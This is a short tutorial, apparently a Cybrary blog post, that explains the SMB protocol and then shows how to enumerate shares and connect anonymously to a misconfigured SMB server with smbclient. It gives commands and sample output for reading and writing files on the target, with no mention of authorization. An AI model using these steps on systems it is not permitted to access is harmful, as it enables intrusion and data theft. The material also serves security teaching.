What's an SMB?

SMB, which stands for Server Message Block, is a protocol for sharing files, printers, serial ports and communications abstractions such as named pipes and mail slots between computers.

SMB is a client-server, request-response protocol. The only exception to the request-response nature of SMB (that is, where the client makes requests and the server sends back responses), is when the client has requested opportunistic locks (oplocks) and the server, subsequently, has to break an already granted oplock because another client has requested a file open with a mode that's incompatible with the granted oplock. In this case, the server sends an unsolicited message to the client signalling the oplock break.

Servers make file systems and other resources (printers, mailslots, named pipes, APIs) available to clients on the network. Client computers may have their own hard disks, but they also want access to the shared file systems and printers on the servers.

(Samba.org)

Exploiting Badly Configured SMB'S

What you'll need:

  1. A machine that can run smbclient command
  2. A vulnerable/poorly configured SMB machine (remote or local)
  3. SMB PORT: 445
Computer network
Computer network



Steps:

Check Sharenames

To view smb share names use the command:
smbclient -L 192.168.25.1 -N
(192.168.25.1 = ip of vulnerable smb)

Sign up now for a free 7 Day Trial today to enroll in these Career Paths:



You'll get something like this:

`WARNING: The "syslog" option is deprecated
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

Sharename Type Comment
--------- ---- -------
arquivos     Disk
IPC$           IPC IPC Service (Samba Server 4.3.9-Ubuntu)
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

Server Comment
--------- -------
SAMBA Samba Server 4.3.9-Ubuntu


Workgroup Master
--------- -------
COMPUTACAO SAMBA `

After doing that, you'll need to pick a Sharename. For example "arquivos" or "IPC$". I highly recommend you to pick one that doesn't have the symbol "$", because it's easy to get one with permissions.

In this case, I'm going to pick "arquivos" as Sharename.

Finally:

smbclient //192.168.25.1/arquivos -N

And, that's pretty much it...
Now, if your host is totally vulnerable, you can upload files, download files, etc.

EX:

` WARNING: The "syslog" option is deprecated
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: > ls
. D 0 Tue Jul 19 09:12:48 2016
.. D 0 Fri May 22 09:25:21 2015
html D 0 Fri Jul 15 03:48:38 2016
codeigniter D 0 Fri Jul 3 17:00:48 2015
serverconfig.php A 100402 Fri Jul 15 03:48:46 2016
phpmyadmin D 0 Fri May 22 16:28:47 2015
khy AR 0 Tue Jul 19 09:12:48 2016
cgitelnet1 D 0 Fri Jul 15 05:40:41 2016
supp1.1 D 0 Tue Jul 7 19:35:09 2015
index.html N 142 Tue May 10 16:30:59 2016
teste.php A 21 Fri May 22 11:56:35 2015
enxjdf.exe N 571074 Mon Apr 14 16:06:33 2008
cherno.php N 210752 Fri Jul 15 05:13:46 2016

151380148 blocks of size 1024. 132224492 blocks available
smb: >

<br><br> You can view all the smbclient commands by typing "?" <br><br>smb: > ?

? allinfo altname archive backup

blocksize cancel casesensitive cd chmod

chown close del dir du

echo exit get getfacl geteas

hardlink help history iosize lcd

link lock lowercase ls l

mask md mget mkdir more

mput newer notify open posix

posixencrypt posixopen posixmkdir posixrmdir posixunlink

print prompt put pwd q

queue quit readlink rd recurse

reget rename reput rm rmdir

showacls setea setmode scopy stat

symlink tar tarmode timeout translate

unlock volume vuid wdel logon

listconnect showconnect tcon tdis tid

logoff .. !
`




I made a Python script that does all the hard work; if you want, you can get it here.

Start Learning Cyber Security today by enrolling in these Courses Now:

Start learning with Cybrary

Create a free account

Related Posts

All Blogs